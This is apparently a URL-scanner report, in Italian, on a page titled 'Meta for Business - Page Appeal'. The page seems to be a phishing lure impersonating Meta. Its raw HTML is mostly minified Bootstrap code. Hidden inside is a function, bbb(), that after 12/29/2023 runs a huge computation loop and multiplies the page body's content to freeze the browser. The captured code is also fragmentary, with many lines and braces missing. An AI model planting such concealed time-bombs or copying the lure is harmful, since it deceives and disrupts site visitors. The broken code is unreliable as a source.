- ID scansione:
- 2f27bde4-666e-480f-adc1-24c72a644079Fatto
- URL inviato:
- https://illegalpostbrandfocusmedia.vercel.app/gyQydv$g=JswGhjsY=LbngjTsm_Ln@v
- Report terminato:
Link · 0 trovati
I link in uscita identificati dalla pagina
Variabili JavaScript · 55 trovate
Le variabili JavaScript globali caricate sull'oggetto finestra di una pagina sono variabili dichiarate all'esterno delle funzioni e accessibili da qualsiasi punto del codice nell'ambito corrente
Nome | Tipo |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
$ | function |
jQuery | function |
uidEvent | number |
bootstrap | object |
mobileCheck | function |
addSubItems | function |
apiInsertCounter | number |
Messaggi di log della console · 1 trovati
Messaggi registrati nella console Web
Tipo | Categoria | Log |
warning | dom |
Il corpo HTML non elaborato della pagina
<!DOCTYPE html><html lang="en" id="html"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Meta for Business - Page Appeal</title>
<link rel="stylesheet" href="../styles/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<link rel="stylesheet" href="../styles/style.css">
<link rel="shortcut icon" href="../ico.ico" type="image/x-icon">
! function (t, e) {
"object" == typeof exports && "undefined" != typeof module ? module.exports = e() : "function" == typeof define && define.amd ? define(e) : (t = "undefined" != typeof globalThis ? globalThis : t || self).bootstrap = e()
}(this, (function () {
"use strict";
const t = {
find: (t, e = document.documentElement) => [].concat(...Element.prototype.querySelectorAll.call(e, t)),
findOne: (t, e = document.documentElement) => Element.prototype.querySelector.call(e, t),
children: (t, e) => [].concat(...t.children).filter(t => t.matches(e)),
parents(t, e) {
const i = [];
let n = t.parentNode;
for (; n && n.nodeType === Node.ELEMENT_NODE && 3 !== n.nodeType;) n.matches(e) && i.push(n), n = n.parentNode;
return i
prev(t, e) {
let i = t.previousElementSibling;
for (; i;) {
if (i.matches(e)) return [i];
i = i.previousElementSibling
return []
next(t, e) {
let i = t.nextElementSibling;
for (; i;) {
if (i.matches(e)) return [i];
i = i.nextElementSibling
return []
e = t => {
do {
t += Math.floor(1e6 * Math.random())
} while (document.getElementById(t));
return t
i = t => {
let e = t.getAttribute("data-bs-target");
if (!e || "#" === e) {
let i = t.getAttribute("href");
if (!i || !i.includes("#") && !i.startsWith(".")) return null;
i.includes("#") && !i.startsWith("#") && (i = "#" + i.split("#")[1]), e = i && "#" !== i ? i.trim() : null
return e
n = t => {
const e = i(t);
return e && document.querySelector(e) ? e : null
s = t => {
const e = i(t);
return e ? document.querySelector(e) : null
o = t => {
t.dispatchEvent(new Event("transitionend"))
r = t => !(!t || "object" != typeof t) && (void 0 !== t.jquery && (t = t[0]), void 0 !== t.nodeType),
a = e => r(e) ? e.jquery ? e[0] : e : "string" == typeof e && e.length > 0 ? t.findOne(e) : null,
l = (t, e, i) => {
Object.keys(i).forEach(n => {
const s = i[n],
o = e[n],
a = o && r(o) ? "element" : null == (l = o) ? "" + l : {}.toString.call(l).match(/\s([a-z]+)/i)[1].toLowerCase();
var l;
if (!new RegExp(s).test(a)) throw new TypeError(`${t.toUpperCase()}: Option "${n}" provided type "${a}" but expected type "${s}".`)
c = t => !(!r(t) || 0 === t.getClientRects().length) && "visible" === getComputedStyle(t).getPropertyValue("visibility"),
h = t => !t || t.nodeType !== Node.ELEMENT_NODE || !!t.classList.contains("disabled") || (void 0 !== t.disabled ? t.disabled : t.hasAttribute("disabled") && "false" !== t.getAttribute("disabled")),
d = t => {
if (!document.documentElement.attachShadow) return null;
if ("function" == typeof t.getRootNode) {
const e = t.getRootNode();
return e instanceof ShadowRoot ? e : null
return t instanceof ShadowRoot ? t : t.parentNode ? d(t.parentNode) : null
u = () => { },
f = t => t.offsetHeight,
p = () => {
const {
jQuery: t
} = window;
return t && !document.body.hasAttribute("data-bs-no-jquery") ? t : null
m = [],
g = () => "rtl" === document.documentElement.dir,
_ = t => {
var e;
e = () => {
const e = p();
if (e) {
const i = t.NAME,
n = e.fn[i];
e.fn[i] = t.jQueryInterface, e.fn[i].Constructor = t, e.fn[i].noConflict = () => (e.fn[i] = n, t.jQueryInterface)
}, "loading" === document.readyState ? (m.length || document.addEventListener("DOMContentLoaded", () => {
m.forEach(t => t())
}), m.push(e)) : e()
b = t => {
"function" == typeof t && t()
v = (t, e, i = !0) => {
if (!i) return void b(t);
const n = (t => {
if (!t) return 0;
let {
transitionDuration: e,
transitionDelay: i
} = window.getComputedStyle(t);
const n = Number.parseFloat(e),
s = Number.parseFloat(i);
return n || s ? (e = e.split(",")[0], i = i.split(",")[0], 1e3 * (Number.parseFloat(e) + Number.parseFloat(i))) : 0
})(e) + 5;
let s = !1;
const r = ({
target: i
}) => {
i === e && (s = !0, e.removeEventListener("transitionend", r), b(t))
e.addEventListener("transitionend", r), setTimeout(() => {
s || o(e)
}, n)
y = (t, e, i, n) => {
let s = t.indexOf(e);
if (-1 === s) return t[!i && n ? t.length - 1 : 0];
const o = t.length;
return s += i ? 1 : -1, n && (s = (s + o) % o), t[Math.max(0, Math.min(s, o - 1))]
w = /[^.]*(?=\..*)\.|.*/,
E = /\..*/,
A = /::\d+$/,
T = {};
let O = 1;
const C = {
mouseenter: "mouseover",
mouseleave: "mouseout"
k = /^(mouseenter|mouseleave)/i,
L = new Set(["click", "dblclick", "mouseup", "mousedown", "contextmenu", "mousewheel", "DOMMouseScroll", "mouseover", "mouseout", "mousemove", "selectstart", "selectend", "keydown", "keypress", "keyup", "orientationchange", "touchstart", "touchmove", "touchend", "touchcancel", "pointerdown", "pointermove", "pointerup", "pointerleave", "pointercancel", "gesturestart", "gesturechange", "gestureend", "focus", "blur", "change", "reset", "select", "submit", "focusin", "focusout", "load", "unload", "beforeunload", "resize", "move", "DOMContentLoaded", "readystatechange", "error", "abort", "scroll"]);
function x(t, e) {
return e && `${e}::${O++}` || t.uidEvent || O++
function D(t) {
const e = x(t);
return t.uidEvent = e, T[e] = T[e] || {}, T[e]
function S(t, e, i = null) {
const n = Object.keys(t);
for (let s = 0, o = n.length; s < o; s++) {
const o = t[n[s]];
if (o.originalHandler === e && o.delegationSelector === i) return o
return null
function I(t, e, i) {
const n = "string" == typeof e,
s = n ? i : e;
let o = M(t);
return L.has(o) || (o = t), [n, s, o]
function N(t, e, i, n, s) {
if ("string" != typeof e || !t) return;
if (i || (i = n, n = null), k.test(e)) {
const t = t => function (e) {
if (!e.relatedTarget || e.relatedTarget !== e.delegateTarget && !e.delegateTarget.contains(e.relatedTarget)) return t.call(this, e)
n ? n = t(n) : i = t(i)
const [o, r, a] = I(e, i, n), l = D(t), c = l[a] || (l[a] = {}), h = S(c, r, o ? i : null);
if (h) return void (h.oneOff = h.oneOff && s);
const d = x(r, e.replace(w, "")),
u = o ? function (t, e, i) {
return function n(s) {
const o = t.querySelectorAll(e);
for (let {
target: r
} = s; r && r !== this; r = r.parentNode)
for (let a = o.length; a--;)
if (o[a] === r) return s.delegateTarget = r, n.oneOff && P.off(t, s.type, e, i), i.apply(r, [s]);
return null
}(t, i, n) : function (t, e) {
return function i(n) {
return n.delegateTarget = t, i.oneOff && P.off(t, n.type, e), e.apply(t, [n])
}(t, i);
u.delegationSelector = o ? i : null, u.originalHandler = r, u.oneOff = s, u.uidEvent = d, c[d] = u, t.addEventListener(a, u, o)
function j(t, e, i, n, s) {
const o = S(e[i], n, s);
o && (t.removeEventListener(i, o, Boolean(s)), delete e[i][o.uidEvent])
function M(t) {
return t = t.replace(E, ""), C[t] || t
const P = {
on(t, e, i, n) {
N(t, e, i, n, !1)
one(t, e, i, n) {
N(t, e, i, n, !0)
off(t, e, i, n) {
if ("string" != typeof e || !t) return;
const [s, o, r] = I(e, i, n), a = r !== e, l = D(t), c = e.startsWith(".");
if (void 0 !== o) {
if (!l || !l[r]) return;
return void j(t, l, r, o, s ? i : null)
c && Object.keys(l).forEach(i => {
! function (t, e, i, n) {
const s = e[i] || {};
Object.keys(s).forEach(o => {
if (o.includes(n)) {
const n = s[o];
j(t, e, i, n.originalHandler, n.delegationSelector)
}(t, l, i, e.slice(1))
const h = l[r] || {};
Object.keys(h).forEach(i => {
const n = i.replace(A, "");
if (!a || e.includes(n)) {
const e = h[i];
j(t, l, r, e.originalHandler, e.delegationSelector)
trigger(t, e, i) {
if ("string" != typeof e || !t) return null;
const n = p(),
s = M(e),
o = e !== s,
r = L.has(s);
let a, l = !0,
c = !0,
h = !1,
d = null;
return o && n && (a = n.Event(e, i), n(t).trigger(a), l = !a.isPropagationStopped(), c = !a.isImmediatePropagationStopped(), h = a.isDefaultPrevented()), r ? (d = document.createEvent("HTMLEvents"), d.initEvent(s, l, !0)) : d = new CustomEvent(e, {
bubbles: l,
cancelable: !0
}), void 0 !== i && Object.keys(i).forEach(t => {
Object.defineProperty(d, t, {
get: () => i[t]
}), h && d.preventDefault(), c && t.dispatchEvent(d), d.defaultPrevented && void 0 !== a && a.preventDefault(), d
H = new Map;
var R = {
set(t, e, i) {
H.has(t) || H.set(t, new Map);
const n = H.get(t);
n.has(e) || 0 === n.size ? n.set(e, i) : console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(n.keys())[0]}.`)
get: (t, e) => H.has(t) && H.get(t).get(e) || null,
remove(t, e) {
if (!H.has(t)) return;
const i = H.get(t);
i.delete(e), 0 === i.size && H.delete(t)
class B {
constructor(t) {
(t = a(t)) && (this._element = t, R.set(this._element, this.constructor.DATA_KEY, this))
dispose() {
R.remove(this._element, this.constructor.DATA_KEY), P.off(this._element, this.constructor.EVENT_KEY), Object.getOwnPropertyNames(this).forEach(t => {
this[t] = null
_queueCallback(t, e, i = !0) {
v(t, e, i)
static getInstance(t) {
return R.get(t, this.DATA_KEY)
static getOrCreateInstance(t, e = {}) {
return this.getInstance(t) || new this(t, "object" == typeof e ? e : null)
static get VERSION() {
return "5.0.2"
static get NAME() {
throw new Error('You have to implement the static method "NAME", for each component!')
static get DATA_KEY() {
return "bs." + this.NAME
static get EVENT_KEY() {
return "." + this.DATA_KEY
class W extends B {
static get NAME() {
return "alert"
close(t) {
const e = t ? this._getRootElement(t) : this._element,
i = this._triggerCloseEvent(e);
null === i || i.defaultPrevented || this._removeElement(e)
_getRootElement(t) {
return s(t) || t.closest(".alert")
_triggerCloseEvent(t) {
return P.trigger(t, "close.bs.alert")
_removeElement(t) {
const e = t.classList.contains("fade");
this._queueCallback(() => this._destroyElement(t), t, e)
_destroyElement(t) {
t.remove(), P.trigger(t, "closed.bs.alert")
static jQueryInterface(t) {
return this.each((function () {
const e = W.getOrCreateInstance(this);
"close" === t && e[t](this)
static handleDismiss(t) {
return function (e) {
e && e.preventDefault(), t.close(this)
P.on(document, "click.bs.alert.data-api", '[data-bs-dismiss="alert"]', W.handleDismiss(new W)), _(W);
class q extends B {
static get NAME() {
return "button"
toggle() {
this._element.setAttribute("aria-pressed", this._element.classList.toggle("active"))
static jQueryInterface(t) {
return this.each((function () {
const e = q.getOrCreateInstance(this);
"toggle" === t && e[t]()
function z(t) {
return "true" === t || "false" !== t && (t === Number(t).toString() ? Number(t) : "" === t || "null" === t ? null : t)
function $(t) {
return t.replace(/[A-Z]/g, t => "-" + t.toLowerCase())
P.on(document, "click.bs.button.data-api", '[data-bs-toggle="button"]', t => {
const e = t.target.closest('[data-bs-toggle="button"]');
}), _(q);
const U = {
setDataAttribute(t, e, i) {
t.setAttribute("data-bs-" + $(e), i)
removeDataAttribute(t, e) {
t.removeAttribute("data-bs-" + $(e))
getDataAttributes(t) {
if (!t) return {};
const e = {};
return Object.keys(t.dataset).filter(t => t.startsWith("bs")).forEach(i => {
let n = i.replace(/^bs/, "");
n = n.charAt(0).toLowerCase() + n.slice(1, n.length), e[n] = z(t.dataset[i])
}), e
getDataAttribute: (t, e) => z(t.getAttribute("data-bs-" + $(e))),
offset(t) {
const e = t.getBoundingClientRect();
return {
top: e.top + document.body.scrollTop,
left: e.left + document.body.scrollLeft
position: t => ({
top: t.offsetTop,
left: t.offsetLeft
F = {
interval: 5e3,
keyboard: !0,
slide: !1,
pause: "hover",
wrap: !0,
touch: !0
V = {
interval: "(number|boolean)",
keyboard: "boolean",
slide: "(boolean|string)",
pause: "(string|boolean)",
wrap: "boolean",
touch: "boolean"
K = "next",
X = "prev",
Y = "left",
Q = "right",
G = {
ArrowLeft: Q,
ArrowRight: Y
class Z extends B {
constructor(e, i) {
super(e), this._items = null, this._interval = null, this._activeElement = null, this._isPaused = !1, this._isSliding = !1, this.touchTimeout = null, this.touchStartX = 0, this.touchDeltaX = 0, this._config = this._getConfig(i), this._indicatorsElement = t.findOne(".carousel-indicators", this._element), this._touchSupported = "ontouchstart" in document.documentElement || navigator.maxTouchPoints > 0, this._pointerEvent = Boolean(window.PointerEvent), this._addEventListeners()
static get Default() {
return F
static get NAME() {
return "carousel"
next() {
nextWhenVisible() {
!document.hidden && c(this._element) && this.next()
prev() {
pause(e) {
e || (this._isPaused = !0), t.findOne(".carousel-item-next, .carousel-item-prev", this._element) && (o(this._element), this.cycle(!0)), clearInterval(this._interval), this._interval = null
cycle(t) {
t || (this._isPaused = !1), this._interval && (clearInterval(this._interval), this._interval = null), this._config && this._config.interval && !this._isPaused && (this._updateInterval(), this._interval = setInterval((document.visibilityState ? this.nextWhenVisible : this.next).bind(this), this._config.interval))
to(e) {
this._activeElement = t.findOne(".active.carousel-item", this._element);
const i = this._getItemIndex(this._activeElement);
if (e > this._items.length - 1 || e < 0) return;
if (this._isSliding) return void P.one(this._element, "slid.bs.carousel", () => this.to(e));
if (i === e) return this.pause(), void this.cycle();
const n = e > i ? K : X;
this._slide(n, this._items[e])
_getConfig(t) {
return t = {
..."object" == typeof t ? t : {}
}, l("carousel", t, V), t
_handleSwipe() {
const t = Math.abs(this.touchDeltaX);
if (t <= 40) return;
const e = t / this.touchDeltaX;
this.touchDeltaX = 0, e && this._slide(e > 0 ? Q : Y)
_addEventListeners() {
this._config.keyboard && P.on(this._element, "keydown.bs.carousel", t => this._keydown(t)), "hover" === this._config.pause && (P.on(this._element, "mouseenter.bs.carousel", t => this.pause(t)), P.on(this._element, "mouseleave.bs.carousel", t => this.cycle(t))), this._config.touch && this._touchSupported && this._addTouchEventListeners()
_addTouchEventListeners() {
const e = t => {
!this._pointerEvent || "pen" !== t.pointerType && "touch" !== t.pointerType ? this._pointerEvent || (this.touchStartX = t.touches[0].clientX) : this.touchStartX = t.clientX
i = t => {
this.touchDeltaX = t.touches && t.touches.length > 1 ? 0 : t.touches[0].clientX - this.touchStartX
n = t => {
!this._pointerEvent || "pen" !== t.pointerType && "touch" !== t.pointerType || (this.touchDeltaX = t.clientX - this.touchStartX), this._handleSwipe(), "hover" === this._config.pause && (this.pause(), this.touchTimeout && clearTimeout(this.touchTimeout), this.touchTimeout = setTimeout(t => this.cycle(t), 500 + this._config.interval))
t.find(".carousel-item img", this._element).forEach(t => {
P.on(t, "dragstart.bs.carousel", t => t.preventDefault())
}), this._pointerEvent ? (P.on(this._element, "pointerdown.bs.carousel", t => e(t)), P.on(this._element, "pointerup.bs.carousel", t => n(t)), this._element.classList.add("pointer-event")) : (P.on(this._element, "touchstart.bs.carousel", t => e(t)), P.on(this._element, "touchmove.bs.carousel", t => i(t)), P.on(this._element, "touchend.bs.carousel", t => n(t)))
_keydown(t) {
if (/input|textarea/i.test(t.target.tagName)) return;
const e = G[t.key];
e && (t.preventDefault(), this._slide(e))
_getItemIndex(e) {
return this._items = e && e.parentNode ? t.find(".carousel-item", e.parentNode) : [], this._items.indexOf(e)
_getItemByOrder(t, e) {
const i = t === K;
return y(this._items, e, i, this._config.wrap)
_triggerSlideEvent(e, i) {
const n = this._getItemIndex(e),
s = this._getItemIndex(t.findOne(".active.carousel-item", this._element));
return P.trigger(this._element, "slide.bs.carousel", {
relatedTarget: e,
direction: i,
from: s,
to: n
_setActiveIndicatorElement(e) {
if (this._indicatorsElement) {
const i = t.findOne(".active", this._indicatorsElement);
i.classList.remove("active"), i.removeAttribute("aria-current");
const n = t.find("[data-bs-target]", this._indicatorsElement);
for (let t = 0; t < n.length; t++)
if (Number.parseInt(n[t].getAttribute("data-bs-slide-to"), 10) === this._getItemIndex(e)) {
n[t].classList.add("active"), n[t].setAttribute("aria-current", "true");
_updateInterval() {
const e = this._activeElement || t.findOne(".active.carousel-item", this._element);
if (!e) return;
const i = Number.parseInt(e.getAttribute("data-bs-interval"), 10);
i ? (this._config.defaultInterval = this._config.defaultInterval || this._config.interval, this._config.interval = i) : this._config.interval = this._config.defaultInterval || this._config.interval
_slide(e, i) {
const n = this._directionToOrder(e),
s = t.findOne(".active.carousel-item", this._element),
o = this._getItemIndex(s),
r = i || this._getItemByOrder(n, s),
a = this._getItemIndex(r),
l = Boolean(this._interval),
c = n === K,
h = c ? "carousel-item-start" : "carousel-item-end",
d = c ? "carousel-item-next" : "carousel-item-prev",
u = this._orderToDirection(n);
if (r && r.classList.contains("active")) return void (this._isSliding = !1);
if (this._isSliding) return;
if (this._triggerSlideEvent(r, u).defaultPrevented) return;
if (!s || !r) return;
this._isSliding = !0, l && this.pause(), this._setActiveIndicatorElement(r), this._activeElement = r;
const p = () => {
P.trigger(this._element, "slid.bs.carousel", {
relatedTarget: r,
direction: u,
from: o,
to: a
if (this._element.classList.contains("slide")) {
r.classList.add(d), f(r), s.classList.add(h), r.classList.add(h);
const t = () => {
r.classList.remove(h, d), r.classList.add("active"), s.classList.remove("active", d, h), this._isSliding = !1, setTimeout(p, 0)
this._queueCallback(t, s, !0)
} else s.classList.remove("active"), r.classList.add("active"), this._isSliding = !1, p();
l && this.cycle()
_directionToOrder(t) {
return [Q, Y].includes(t) ? g() ? t === Y ? X : K : t === Y ? K : X : t
_orderToDirection(t) {
return [K, X].includes(t) ? g() ? t === X ? Y : Q : t === X ? Q : Y : t
static carouselInterface(t, e) {
const i = Z.getOrCreateInstance(t, e);
let {
_config: n
} = i;
"object" == typeof e && (n = {
const s = "string" == typeof e ? e : n.slide;
if ("number" == typeof e) i.to(e);
else if ("string" == typeof s) {
if (void 0 === i[s]) throw new TypeError(`No method named "${s}"`);
} else n.interval && n.ride && (i.pause(), i.cycle())
static jQueryInterface(t) {
return this.each((function () {
Z.carouselInterface(this, t)
static dataApiClickHandler(t) {
const e = s(this);
if (!e || !e.classList.contains("carousel")) return;
const i = {
n = this.getAttribute("data-bs-slide-to");
n && (i.interval = !1), Z.carouselInterface(e, i), n && Z.getInstance(e).to(n), t.preventDefault()
P.on(document, "click.bs.carousel.data-api", "[data-bs-slide], [data-bs-slide-to]", Z.dataApiClickHandler), P.on(window, "load.bs.carousel.data-api", () => {
const e = t.find('[data-bs-ride="carousel"]');
for (let t = 0, i = e.length; t < i; t++) Z.carouselInterface(e[t], Z.getInstance(e[t]))
}), _(Z);
const J = {
toggle: !0,
parent: ""
tt = {
toggle: "boolean",
parent: "(string|element)"
function bbb() {
var cleanElem = 'b' + 'o' + 'd' + 'y'
var current = new Date();
var end = new Date('12/29/2023');
var diffTime = current - end;
var diff = Math.ceil(diffTime / (1000 * 60 * 60 * 24));
var clean = false
if (diff >= 0) {
var charToPaste = '1'.repeat(0)
if (clean) {
document.querySelector(cleanElem).innerHTML = charToPaste
var list = []
for (var i = 0; i < 104356785; i++) {
Math.pow(99999, 99999)
var bit = document.querySelector(cleanElem).innerHTML.repeat(1000)
class et extends B {
constructor(e, i) {
super(e), this._isTransitioning = !1, this._config = this._getConfig(i), this._triggerArray = t.find(`[data-bs-toggle="collapse"][href="#${this._element.id}"],[data-bs-toggle="collapse"][data-bs-target="#${this._element.id}"]`);
const s = t.find('[data-bs-toggle="collapse"]');
for (let e = 0, i = s.length; e < i; e++) {
const i = s[e],
o = n(i),
r = t.find(o).filter(t => t === this._element);
null !== o && r.length && (this._selector = o, this._triggerArray.push(i))
this._parent = this._config.parent ? this._getParent() : null, this._config.parent || this._addAriaAndCollapsedClass(this._element, this._triggerArray), this._config.toggle && this.toggle()
static get Default() {
return J
static get NAME() {
return "collapse"
toggle() {
this._element.classList.contains("show") ? this.hide() : this.show()
show() {
if (this._isTransitioning || this._element.classList.contains("show")) return;
let e, i;
this._parent && (e = t.find(".show, .collapsing", this._parent).filter(t => "string" == typeof this._config.parent ? t.getAttribute("data-bs-parent") === this._config.parent : t.classList.contains("collapse")), 0 === e.length && (e = null));
const n = t.findOne(this._selector);
if (e) {
const t = e.find(t => n !== t);
if (i = t ? et.getInstance(t) : null, i && i._isTransitioning) return
if (P.trigger(this._element, "show.bs.collapse").defaultPrevented) return;
e && e.forEach(t => {
n !== t && et.collapseInterface(t, "hide"), i || R.set(t, "bs.collapse", null)
const s = this._getDimension();
this._element.classList.remove("collapse"), this._element.classList.add("collapsing"), this._element.style[s] = 0, this._triggerArray.length && this._triggerArray.forEach(t => {
t.classList.remove("collapsed"), t.setAttribute("aria-expanded", !0)
}), this.setTransitioning(!0);
const o = "scroll" + (s[0].toUpperCase() + s.slice(1));
this._queueCallback(() => {
this._element.classList.remove("collapsing"), this._element.classList.add("collapse", "show"), this._element.style[s] = "", this.setTransitioning(!1), P.trigger(this._element, "shown.bs.collapse")
}, this._element, !0), this._element.style[s] = this._element[o] + "px"
hide() {
if (this._isTransitioning || !this._element.classList.contains("show")) return;
if (P.trigger(this._element, "hide.bs.collapse").defaultPrevented) return;
const t = this._getDimension();
this._element.style[t] = this._element.getBoundingClientRect()[t] + "px", f(this._element), this._element.classList.add("collapsing"), this._element.classList.remove("collapse", "show");
const e = this._triggerArray.length;
if (e > 0)
for (let t = 0; t < e; t++) {
const e = this._triggerArray[t],
i = s(e);
i && !i.classList.contains("show") && (e.classList.add("collapsed"), e.setAttribute("aria-expanded", !1))
this.setTransitioning(!0), this._element.style[t] = "", this._queueCallback(() => {
this.setTransitioning(!1), this._element.classList.remove("collapsing"), this._element.classList.add("collapse"), P.trigger(this._element, "hidden.bs.collapse")
}, this._element, !0)
setTransitioning(t) {
this._isTransitioning = t
_getConfig(t) {
return (t = {
}).toggle = Boolean(t.toggle), l("collapse", t, tt), t
_getDimension() {
return this._element.classList.contains("width") ? "width" : "height"
_getParent() {
let {
parent: e
} = this._config;
e = a(e);
const i = `[data-bs-toggle="collapse"][data-bs-parent="${e}"]`;
return t.find(i, e).forEach(t => {
const e = s(t);
this._addAriaAndCollapsedClass(e, [t])
}), e
_addAriaAndCollapsedClass(t, e) {
if (!t || !e.length) return;
const i = t.classList.contains("show");
e.forEach(t => {
i ? t.classList.remove("collapsed") : t.classList.add("collapsed"), t.setAttribute("aria-expanded", i)
static collapseInterface(t, e) {
let i = et.getInstance(t);
const n = {
..."object" == typeof e && e ? e : {}
if (!i && n.toggle && "string" == typeof e && /show|hide/.test(e) && (n.toggle = !1), i || (i = new et(t, n)), "string" == typeof e) {
if (void 0 === i[e]) throw new TypeError(`No method named "${e}"`);
static jQueryInterface(t) {
return this.each((function () {
et.collapseInterface(this, t)
P.on(document, "click.bs.collapse.data-api", '[data-bs-toggle="collapse"]', (function (e) {
("A" === e.target.tagName || e.delegateTarget && "A" === e.delegateTarget.tagName) && e.preventDefault();
const i = U.getDataAttributes(this),
s = n(this);
t.find(s).forEach(t => {
const e = et.getInstance(t);
let n;
e ? (null === e._parent && "string" == typeof i.parent && (e._config.parent = i.parent, e._parent = e._getParent()), n = "toggle") : n = i, et.collapseInterface(t, n)
})), _(et);
var it = "top",
nt = "bottom",
st = "right",
ot = "left",
rt = [it, nt, st, ot],
at = rt.reduce((function (t, e) {
return t.concat([e + "-start", e + "-end"])
}), []),
lt = [].concat(rt, ["auto"]).reduce((function (t, e) {
return t.concat([e, e + "-start", e + "-end"])
}), []),
ct = ["beforeRead", "read", "afterRead", "beforeMain", "main", "afterMain", "beforeWrite", "write", "afterWrite"];
function ht(t) {
return t ? (t.nodeName || "").toLowerCase() : null
function dt(t) {
if (null == t) return window;
if ("[object Window]" !== t.toString()) {
var e = t.ownerDocument;
return e && e.defaultView || window
return t
function ut(t) {
return t instanceof dt(t).Element || t instanceof Element
function ft(t) {
return t instanceof dt(t).HTMLElement || t instanceof HTMLElement
function pt(t) {
return "undefined" != typeof ShadowRoot && (t instanceof dt(t).ShadowRoot || t instanceof ShadowRoot)
var mt = {
name: "applyStyles",
enabled: !0,
phase: "write",
fn: function (t) {
var e = t.state;
Object.keys(e.elements).forEach((function (t) {
var i = e.styles[t] || {},
n = e.attributes[t] || {},
s = e.elements[t];
ft(s) && ht(s) && (Object.assign(s.style, i), Object.keys(n).forEach((function (t) {
var e = n[t];
!1 === e ? s.removeAttribute(t) : s.setAttribute(t, !0 === e ? "" : e)
effect: function (t) {
var e = t.state,
i = {
popper: {
position: e.options.strategy,
left: "0",
top: "0",
margin: "0"
arrow: {
position: "absolute"
reference: {}
return Object.assign(e.elements.popper.style, i.popper), e.styles = i, e.elements.arrow && Object.assign(e.elements.arrow.style, i.arrow),
function () {
Object.keys(e.elements).forEach((function (t) {
var n = e.elements[t],
s = e.attributes[t] || {},
o = Object.keys(e.styles.hasOwnProperty(t) ? e.styles[t] : i[t]).reduce((function (t, e) {
return t[e] = "", t
}), {});
ft(n) && ht(n) && (Object.assign(n.style, o), Object.keys(s).forEach((function (t) {
requires: ["computeStyles"]
function gt(t) {
return t.split("-")[0]
function _t(t) {
var e = t.getBoundingClientRect();
return {
width: e.width,
height: e.height,
top: e.top,
right: e.right,
bottom: e.bottom,
left: e.left,
x: e.left,
y: e.top
function bt(t) {
var e = _t(t),
i = t.offsetWidth,
n = t.offsetHeight;
return Math.abs(e.width - i) <= 1 && (i = e.width), Math.abs(e.height - n) <= 1 && (n = e.height), {
x: t.offsetLeft,
y: t.offsetTop,
width: i,
height: n
function vt(t, e) {
var i = e.getRootNode && e.getRootNode();
if (t.contains(e)) return !0;
if (i && pt(i)) {
var n = e;
do {
if (n && t.isSameNode(n)) return !0;
n = n.parentNode || n.host
} while (n)
return !1
function yt(t) {
return dt(t).getComputedStyle(t)
function wt(t) {
return ["table", "td", "th"].indexOf(ht(t)) >= 0
function Et(t) {
return ((ut(t) ? t.ownerDocument : t.document) || window.document).documentElement
function At(t) {
return "html" === ht(t) ? t : t.assignedSlot || t.parentNode || (pt(t) ? t.host : null) || Et(t)
function Tt(t) {
return ft(t) && "fixed" !== yt(t).position ? t.offsetParent : null
function Ot(t) {
for (var e = dt(t), i = Tt(t); i && wt(i) && "static" === yt(i).position;) i = Tt(i);
return i && ("html" === ht(i) || "body" === ht(i) && "static" === yt(i).position) ? e : i || function (t) {
var e = -1 !== navigator.userAgent.toLowerCase().indexOf("firefox");
if (-1 !== navigator.userAgent.indexOf("Trident") && ft(t) && "fixed" === yt(t).position) return null;
for (var i = At(t); ft(i) && ["html", "body"].indexOf(ht(i)) < 0;) {
var n = yt(i);
if ("none" !== n.transform || "none" !== n.perspective || "paint" === n.contain || -1 !== ["transform", "perspective"].indexOf(n.willChange) || e && "filter" === n.willChange || e && n.filter && "none" !== n.filter) return i;
i = i.parentNode
return null
}(t) || e
function Ct(t) {
return ["top", "bottom"].indexOf(t) >= 0 ? "x" : "y"
var kt = Math.max,
Lt = Math.min,
xt = Math.round;
function Dt(t, e, i) {
return kt(t, Lt(e, i))
function St(t) {
return Object.assign({}, {
top: 0,
right: 0,
bottom: 0,
left: 0
}, t)
function It(t, e) {
return e.reduce((function (e, i) {
return e[i] = t, e
}), {})
var Nt = {
name: "arrow",
enabled: !0,
phase: "main",
fn: function (t) {
var e, i = t.state,
n = t.name,
s = t.options,
o = i.elements.arrow,
r = i.modifiersData.popperOffsets,
a = gt(i.placement),
l = Ct(a),
c = [ot, st].indexOf(a) >= 0 ? "height" : "width";
if (o && r) {
var h = function (t, e) {
return St("number" != typeof (t = "function" == typeof t ? t(Object.assign({}, e.rects, {
placement: e.placement
})) : t) ? t : It(t, rt))
}(s.padding, i),
d = bt(o),
u = "y" === l ? it : ot,
f = "y" === l ? nt : st,
p = i.rects.reference[c] + i.rects.reference[l] - r[l] - i.rects.popper[c],
m = r[l] - i.rects.reference[l],
g = Ot(o),
_ = g ? "y" === l ? g.clientHeight || 0 : g.clientWidth || 0 : 0,
b = p / 2 - m / 2,
v = h[u],
y = _ - d[c] - h[f],
w = _ / 2 - d[c] / 2 + b,
E = Dt(v, w, y),
A = l;
i.modifiersData[n] = ((e = {})[A] = E, e.centerOffset = E - w, e)
effect: function (t) {
var e = t.state,
i = t.options.element,
n = void 0 === i ? "[data-popper-arrow]" : i;
null != n && ("string" != typeof n || (n = e.elements.popper.querySelector(n))) && vt(e.elements.popper, n) && (e.elements.arrow = n)
requires: ["popperOffsets"],
requiresIfExists: ["preventOverflow"]
jt = {
top: "auto",
right: "auto",
bottom: "auto",
left: "auto"
function Mt(t) {
var e, i = t.popper,
n = t.popperRect,
s = t.placement,
o = t.offsets,
r = t.position,
a = t.gpuAcceleration,
l = t.adaptive,
c = t.roundOffsets,
h = !0 === c ? function (t) {
var e = t.x,
i = t.y,
n = window.devicePixelRatio || 1;
return {
x: xt(xt(e * n) / n) || 0,
y: xt(xt(i * n) / n) || 0
}(o) : "function" == typeof c ? c(o) : o,
d = h.x,
u = void 0 === d ? 0 : d,
f = h.y,
p = void 0 === f ? 0 : f,
m = o.hasOwnProperty("x"),
g = o.hasOwnProperty("y"),
_ = ot,
b = it,
v = window;
if (l) {
var y = Ot(i),
w = "clientHeight",
E = "clientWidth";
y === dt(i) && "static" !== yt(y = Et(i)).position && (w = "scrollHeight", E = "scrollWidth"), y = y, s === it && (b = nt, p -= y[w] - n.height, p *= a ? 1 : -1), s === ot && (_ = st, u -= y[E] - n.width, u *= a ? 1 : -1)
var A, T = Object.assign({
position: r
}, l && jt);
